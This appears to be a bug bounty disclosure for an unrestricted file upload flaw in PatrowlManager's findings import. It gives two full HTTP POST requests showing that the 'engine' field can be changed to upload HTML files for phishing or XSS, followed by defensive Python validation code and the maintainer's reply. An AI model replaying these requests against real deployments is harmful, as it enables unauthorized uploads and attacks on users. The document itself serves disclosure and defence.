Unrestricted Upload of File with Dangerous Type in patrowl/patrowlmanager
Valid
Reported on Dec 11th 2021
Description
Hi there, I would like to report a vulnerability in the way PatrowlManager handles uploaded files. This is in the Finding -> Import feature.
Proof of Concept
- Install PatrowlManager on your local system
- Go to Finding -> Import and import a file
- An import request looks like this
POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 886
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"
nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"
html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"
info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="file.json"
Content-Type: text/html
file-content
-----------------------------29659837897421318982168117420--
If you change the "engine" value in the above request to another extension such as .html or .py, you can upload any type of file you want. One example of uploading an HTML file for phishing and XSS is
POST /findings/import HTTP/1.1
Host: localhost:8083
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------29659837897421318982168117420
Content-Length: 875
Origin: http://localhost:8083
Connection: close
Referer: http://localhost:8083/findings/import
Cookie: patrowl-manager-sc=d7q0a2r8b3b3ytmslj252gxt2l3epdmn
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="csrfmiddlewaretoken"
nMMKSdScbbCYF7NK7YyzuaW9diH5PhI24HBlLGDuAGf1VI5RhmDQdnrpiGyaZaG2
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="engine"
html
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="min_level"
info
-----------------------------29659837897421318982168117420
Content-Disposition: form-data; name="file"; filename="patrowl.html"
Content-Type: text/html
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>Here</title>
</head>
<body>
<a href="https://example.com">Click here</a>
</body>
</html>
-----------------------------29659837897421318982168117420--
- Go to the folder /media/imports/<owner_id>/ and see that the dangerous HTML file has been uploaded.
Impact
This vulnerability allows uploading dangerous file types to the server.
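The root cause described above is that a client-controlled form field decides which file types the import endpoint accepts. The following is an added example of the server-side check a maintainer would put in front of the import handler; it is not PatrowlManager's own code. It assumes a fixed allowlist of importable report formats (.json and .csv), a size limit of 5 MiB, and the function names shown here. The "engine" field is still received, but it never influences whether the upload is accepted; acceptance depends on a server-side extension allowlist, a sniff of the leading bytes for markup, a parse of the content as the claimed format, and a server-generated storage name so the client-supplied filename never touches the filesystem.

```python
import csv
import io
import json
import os
import re
import secrets
from dataclasses import dataclass
from typing import Optional

# Assumption: the import feature only needs structured report formats.
# The allowlist lives server-side; the user-supplied "engine" form field is
# never consulted when deciding what is acceptable.
ALLOWED_EXTENSIONS = {".json", ".csv"}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024  # assumed limit

# Only the leading bytes are sniffed: a JSON report may legitimately contain
# "<script" inside a string value (e.g. an XSS finding), but a real report
# never *starts* with markup.
_LEADING_MARKUP = re.compile(
    rb"\s*<\s*(!doctype|html|script|body|head|iframe|svg)\b", re.IGNORECASE
)


class UploadRejected(ValueError):
    """Raised when an upload fails any of the server-side checks."""


@dataclass
class AcceptedUpload:
    stored_name: str   # server-generated name used on disk
    extension: str
    size: int


def _parses_as(ext: str, content: bytes) -> bool:
    """Return True only if the bytes really are the format the extension claims."""
    try:
        text = content.decode("utf-8")
    except UnicodeDecodeError:
        return False
    if ext == ".json":
        try:
            json.loads(text)
        except ValueError:
            return False
        return True
    if ext == ".csv":
        rows = [r for r in csv.reader(io.StringIO(text)) if r]
        return len(rows) > 0 and all(len(r) == len(rows[0]) for r in rows)
    return False


def validate_import_upload(filename: str, content: bytes,
                           engine: Optional[str] = None) -> AcceptedUpload:
    """Validate an import upload independently of any client-chosen 'engine'.

    'engine' is accepted only so a caller can log it; it has no effect on the
    decision. Letting it pick the allowed extension is the defect in the report.
    """
    if len(content) == 0 or len(content) > MAX_UPLOAD_BYTES:
        raise UploadRejected("empty or oversized upload")

    # Strip any directory components (both separator styles) before looking at
    # the extension, then compare the lowercased extension to the allowlist.
    base = os.path.basename(filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {ext!r} is not an importable report format")

    # Extension checks alone are bypassable (report.json with HTML inside), so
    # the content itself is also inspected.
    if _LEADING_MARKUP.match(content[:512]):
        raise UploadRejected("content starts with HTML/markup, not a report")
    if not _parses_as(ext, content):
        raise UploadRejected(f"content is not valid {ext[1:].upper()}")

    # Never reuse the client's filename on disk: generate one server-side.
    stored_name = f"{secrets.token_hex(16)}{ext}"
    return AcceptedUpload(stored_name=stored_name, extension=ext, size=len(content))


def is_accepted(filename: str, content: bytes, engine: Optional[str] = None) -> bool:
    """Convenience wrapper: True if the upload passes, False if it is rejected."""
    try:
        validate_import_upload(filename, content, engine)
    except UploadRejected:
        return False
    return True


# Constructed sample inputs (not taken from any real system).
SAMPLE_JSON = b'{"findings": [{"title": "constructed finding", "severity": "info"}]}'
SAMPLE_HTML = (b'<!DOCTYPE html>\n<html><body>'
               b'<a href="https://example.com">Click here</a></body></html>\n')
SAMPLE_CSV = b"host,port\n10.0.0.1,443\n"

if __name__ == "__main__":
    for name, body, engine in [("findings.json", SAMPLE_JSON, "html"),
                               ("patrowl.html", SAMPLE_HTML, "html"),
                               ("report.json", SAMPLE_HTML, "json"),
                               ("../../evil.json", SAMPLE_JSON, None),
                               ("scan.csv", SAMPLE_CSV, None)]:
        try:
            acc = validate_import_upload(name, body, engine)
            print(f"ACCEPT {name!r} -> stored as {acc.stored_name}")
        except UploadRejected as exc:
            print(f"REJECT {name!r}: {exc}")
```

The check is deliberately layered: the allowlist stops the .html and .py cases from the report, the markup sniff and the format parse stop an HTML payload renamed to .json, and the generated storage name removes any dependence on the client-supplied path, so a traversal-looking filename is harmless even if the allowlist were later widened.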
We are processing your report and will contact the patrowl/patrowlmanager team within 24 hours.
a year ago
We have contacted a member of the patrowl/patrowlmanager team and are waiting to hear back
a year ago
Hi @M0rphling, thanks for your report! Will fix it ASAP
The fix bounty has been dropped
This vulnerability will not receive a CVE